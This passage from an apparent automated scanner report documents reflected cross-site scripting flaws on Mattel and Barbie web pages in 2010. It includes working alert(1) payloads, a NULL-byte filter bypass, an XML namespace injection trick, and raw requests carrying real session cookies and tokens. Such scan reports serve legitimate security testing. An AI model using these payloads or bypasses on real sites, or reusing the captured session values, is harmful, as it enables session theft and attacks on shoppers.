Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43920


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<!-- === Request Query String: productId=3738867&7155e--><script>alert(1)</script>64bb62cd0af=1 -->
...[SNIP]...

1.66. https://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /giftCertificates/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e95e4"-alert(1)-"ba8774a4224 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /giftCertificates/index.jsp?e95e4"-alert(1)-"ba8774a4224=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:56 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43932


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="https://shop.mattel.com";
    ess['qs']="productId=3738867&e95e4"-alert(1)-"ba8774a4224=1";
   </script>
...[SNIP]...

1.67. https://shop.mattel.com/product/wishlist/wishlist.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /product/wishlist/wishlist.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a7af6--><script>alert(1)</script>e0edaf36a48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /product/wishlist/wishlist.jsp?a7af6--><script>alert(1)</script>e0edaf36a48=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:59 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:06 GMT; path=/
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36782


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:/
...[SNIP]...
<!-- === Request Query String: a7af6--><script>alert(1)</script>e0edaf36a48=1 -->
...[SNIP]...

1.68. https://shop.mattel.com/product/wishlist/wishlist.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /product/wishlist/wishlist.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %008cdef"-alert(1)-"d3ac09be35f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8cdef"-alert(1)-"d3ac09be35f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /product/wishlist/wishlist.jsp?%008cdef"-alert(1)-"d3ac09be35f=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:58 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:05 GMT; path=/
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36756


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:/
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="https://shop.mattel.com";
    ess['qs']="%008cdef"-alert(1)-"d3ac09be35f=1";
   </script>
...[SNIP]...

1.69. https://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /storeLocator/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79e26"-alert(1)-"8e17875d268 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /storeLocator/index.jsp?79e26"-alert(1)-"8e17875d268=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:56 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 40857


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="https://shop.mattel.com";
    ess['qs']="79e26"-alert(1)-"8e17875d268=1";
   </script>
...[SNIP]...

1.70. https://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /storeLocator/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 163a7--><script>alert(1)</script>cd69434ff01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /storeLocator/index.jsp?163a7--><script>alert(1)</script>cd69434ff01=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:57 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 40821


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<!-- === Request Query String: 163a7--><script>alert(1)</script>cd69434ff01=1 -->
...[SNIP]...

1.71. http://videogirlcontest.barbie.com/get_contest_entries [count parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://videogirlcontest.barbie.com
Path:   /get_contest_entries

Issue detail

The value of the count request parameter is copied into the XML document as plain text between tags. The payload dd6a0<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>f87dd1d1038a469c5 was submitted in the count parameter. This input was echoed as dd6a0<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>f87dd1d1038a469c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /get_contest_entries?xml=1&count=5dd6a0<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>f87dd1d1038a469c5&cid=p1core%2Dtbx08%2Ef%2E1800%2Faf61f%2F6ef%2F4685c45d%2E3bb987c281132ce7eb6dd8bbc428b941&category=1&page=1 HTTP/1.1
Host: videogirlcontest.barbie.com
Proxy-Connection: keep-alive
Referer: http://videogirlcontest.barbie.com/public/media/BarbieGalleryVote_safe.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937; __utmz=79148947.1293083893.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=79148947.1435285988.1293083893.1293083893.1293083893.1; __utmc=79148947; __utmb=79148947.4.10.1293083893

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 3275
Content-Type: text/xml; charset=utf-8
Expires: Thu, 23 Dec 2010 00:12:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 23 Dec 2010 00:12:26 GMT
Connection: close
Set-Cookie: session=4d1293eaf95db56a; path=/; expires=Thu, 23-Dec-2010 00:42:26 GMT

<?xml version="1.0" encoding="UTF-8" ?>

<gallery cid="p1core-tbx12.f.1800/af620/2ea/b9b0b736.a08f5b616eda43046f14d66460fdad9f">

<categories>
<item data="" label="All Categories" sele
...[SNIP]...
<entries_per_page>5dd6a0<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>f87dd1d1038a469c5</entries_per_page>
...[SNIP]...

1.72. http://videogirlcontest.barbie.com/get_contest_entries [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://videogirlcontest.barbie.com
Path:   /get_contest_entries

Issue detail

The value of the page request parameter is copied into the XML document as plain text between tags. The payload %0077700<a%20xmlns%3aa%3d"http%3a//www.w3.org/1999/xhtml"><a%3abody%20onload%3d"alert(1)"/></a>75baf303698aec4c7 was submitted in the page parameter. This input was echoed as 77700<a xmlns:a="http://www.w3.org/1999/xhtml"><a:body onload="alert(1)"/></a>75baf303698aec4c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /get_contest_entries?xml=1&count=5&cid=p1core%2Dtbx08%2Ef%2E1800%2Faf61f%2F6ef%2F4685c45d%2E3bb987c281132ce7eb6dd8bbc428b941&category=2&page=1%0077700<a%20xmlns%3aa%3d"http%3a//www.w3.org/1999/xhtml"><a%3abody%20onload%3d"alert(1)"/></a>75baf303698aec4c7 HTTP/1.1
Host: videogirlcontest.barbie.com
Proxy-Connection: keep-alive
Referer: http://videogirlcontest.barbie.com/public/media/BarbieGalleryVote_safe.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937; __utmz=79148947.1293083893.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=79148947.1435285988.1293083893.1293083893.1293083893.1; __utmc=79148947; __utmb=79148947.4.10.1293083893

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 6787
Content-Type: text/xml; charset=utf-8
Expires: Thu, 23 Dec 2010 00:12:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 23 Dec 2010 00:12:31 GMT
Connection: close
Set-Cookie: session=4d1293ee9ab6f3c0; path=/; expires=Thu, 23-Dec-2010 00:42:30 GMT

<?xml version="1.0" encoding="UTF-8" ?>

<gallery cid="p1core-tbx09.f.1800/af620/2ee/edfd9fd7.aa1ea1d7114adff9340e018a8bb03ea6">

<categories>
<item data="" label="All Categories" sele
...[SNIP]...
<page_number>1.77700<a xmlns:a="http://www.w3.org/1999/xhtml"><a:body onload="alert(1)"/></a>75baf303698aec4c7</page_number>
...[SNIP]...

1.73. http://shop.mattel.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 714b8"><script>alert(1)</script>8c42dd9f9f3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Referer: http://www.google.com/search?hl=en&q=714b8"><script>alert(1)</script>8c42dd9f9f3

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:36 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45370


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T
...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=714b8"><script>alert(1)</script>8c42dd9f9f3;u2=1;u3=;u1=;ord=1;num=99400337?" width="1" height="1" frameborder="0">
...[SNIP]...

1.74. http://shop.mattel.com/cartHandler/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /cartHandler/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae536"><script>alert(1)</script>9892daaa3cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /cartHandler/index.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Referer: http://www.google.com/search?hl=en&q=ae536"><script>alert(1)</script>9892daaa3cd

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:34 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 45101


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T
...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=2684368;type=homep927;cat=homep961;u6=;u4=;u5=http://www.google.com/search?hl=en&q=ae536"><script>alert(1)</script>9892daaa3cd;u2=1;u3=;u1=;ord=1;num=40158534?" width="1" height="1" frameborder="0">
...[SNIP]...

1.75. http://shop.mattel.com/category/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /category/index.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83600"><script>alert(1)</script>03a94f135fd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /category/index.jsp?categoryId=3741286 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
